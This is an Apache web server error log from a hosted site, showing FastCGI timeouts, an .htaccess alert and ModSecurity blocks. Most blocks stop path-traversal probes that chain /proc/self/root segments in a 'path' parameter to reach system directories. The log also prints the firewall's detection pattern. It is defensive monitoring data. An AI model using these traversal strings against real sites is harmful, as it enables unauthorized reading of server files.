[Wed Mar 18 17:33:19.105187 2026] [core:alert] [pid 29882:tid 140411590858496] [client 74.7.243.128:56860] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done
[Wed Mar 18 17:33:46.705049 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35476] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:34:16.133774 2026] [proxy_fcgi:error] [pid 9530:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36244] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:34:40.129892 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36828] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:35:03.158468 2026] [proxy_fcgi:error] [pid 9333:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37336] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:35:26.129875 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37870] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:35:39.625597 2026] [core:alert] [pid 30077:tid 140411624429312] [client 57.141.18.60:40252] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:35:49.125781 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38444] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:36:13.137828 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38986] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:36:14.867991 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.244.43:59704] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absMvta6ubjKNq_cu4bcPAAAA0U"]
[Wed Mar 18 17:36:29.845067 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.228.61:40708] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absMzUzinOy1jxa1j4deqgAAAQ0"]
[Wed Mar 18 17:36:36.127326 2026] [proxy_fcgi:error] [pid 9333:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39542] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:36:40.640435 2026] [mime_magic:error] [pid 17653:tid 140411624429312] (70014)End of file found: [client 57.141.18.58:41584] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:36:40.794195 2026] [core:alert] [pid 27293:tid 140411699963648] [client 74.7.243.128:41644] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state
[Wed Mar 18 17:36:59.137806 2026] [proxy_fcgi:error] [pid 9800:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40104] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:37:21.097815 2026] [proxy_fcgi:error] [pid 9333:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40630] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:37:22.802173 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:52004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNAsdf6f5d65gmYZQU_AAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 17:37:46.033809 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41204] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:37:54.298433 2026] [:error] [pid 23798:tid 140411699963648] [client 74.7.243.128:60818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNIj-9rzzdA3Ti0NCR4gAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 17:38:03.515945 2026] [mime_magic:error] [pid 23798:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:43544] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/systemd/system
[Wed Mar 18 17:38:09.007062 2026] [core:alert] [pid 26799:tid 140411699963648] [client 57.141.18.0:43692] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:38:09.009285 2026] [core:alert] [pid 9333:tid 140411599251200] [client 74.7.241.31:58424] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/systemd/system
[Wed Mar 18 17:38:09.141784 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41744] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:38:36.116727 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42304] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:39:05.285939 2026] [proxy_fcgi:error] [pid 9530:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42912] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:39:13.643335 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:40828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNcQbLMZ6AikZjR9UAPgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 17:39:20.697514 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:60732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNeEzinOy1jxa1j4de2gAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 17:39:37.244605 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43644] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:39:58.259289 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:60734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNngkwaGbbGflqUZBUEAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:40:08.121842 2026] [proxy_fcgi:error] [pid 9800:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44402] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:40:10.656091 2026] [:error] [pid 23798:tid 140411699963648] [client 74.7.241.31:54606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNqj-9rzzdA3Ti0NCSCgAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:40:30.673912 2026] [mime_magic:error] [pid 17887:tid 140411599251200] (70014)End of file found: [client 57.141.18.54:46436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:40:34.121042 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44986] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:40:39.745557 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:60734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absNxwkwaGbbGflqUZBUIgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:40:59.116443 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45584] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:41:19.210332 2026] [:error] [pid 9530:tid 140411582465792] [client 74.7.244.43:54556] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absN7wSuyh5UNeevTVflHgAAAxM"]
[Wed Mar 18 17:41:21.121802 2026] [proxy_fcgi:error] [pid 9530:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46082] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:41:33.163884 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:34734] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absN_QkwaGbbGflqUZBUMAAAAM4"]
[Wed Mar 18 17:41:44.129839 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46614] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:42:06.133813 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:42:14.363067 2026] [:error] [pid 9800:tid 140411590858496] [client 74.7.243.128:35306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absOJoJpNEVVDhwB8vOFBAAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:42:28.460057 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:39282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absONPu8EFLIOrSqIps_UQAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 17:42:30.109813 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47714] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:42:53.382741 2026] [proxy_fcgi:error] [pid 23798:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48230] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:43:15.124041 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48766] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:43:24.508922 2026] [core:alert] [pid 30077:tid 140411641214720] [client 57.141.18.50:49484] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:43:25.923160 2026] [core:alert] [pid 27403:tid 140411632822016] [client 57.141.18.60:49562] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:43:40.129811 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49444] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:44:02.141806 2026] [proxy_fcgi:error] [pid 29882:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:44:26.289974 2026] [proxy_fcgi:error] [pid 9333:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50502] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:44:54.975895 2026] [proxy_fcgi:error] [pid 9530:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51072] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:45:19.137596 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51530] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:45:39.015699 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:51374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absO8xkFeYa1D6dYQnCNUgAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 17:45:46.540367 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52082] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:46:14.145963 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52608] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:46:38.539347 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.244.43:55926] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absPLuoXxyEfFpUF8f-2MAAAAUU"]
[Wed Mar 18 17:46:41.201808 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53202] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:46:41.453888 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.228.61:54494] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absPMeyqAr6etmhZHNoJawAAAEM"]
[Wed Mar 18 17:47:07.537937 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53756] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:47:31.560024 2026] [proxy_fcgi:error] [pid 9800:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54354] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:47:54.489871 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54866] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:48:16.721778 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:48:40.169846 2026] [proxy_fcgi:error] [pid 23798:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55890] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:49:04.245863 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56522] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:49:26.130953 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57054] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:49:50.053817 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57436] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:50:16.937850 2026] [proxy_fcgi:error] [pid 9530:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57762] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:51:03.741826 2026] [proxy_fcgi:error] [pid 23798:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58096] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:51:38.316883 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58396] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:52:00.161528 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:52:36.872262 2026] [proxy_fcgi:error] [pid 9800:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58762] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:53:16.769843 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58842] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:53:52.277915 2026] [proxy_fcgi:error] [pid 23798:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58898] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:54:27.237273 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58952] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:54:48.186598 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59168] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:55:17.035773 2026] [proxy_fcgi:error] [pid 9530:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59470] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:56:38.401883 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59492] AH01075: Error dispatching request to : (polling)
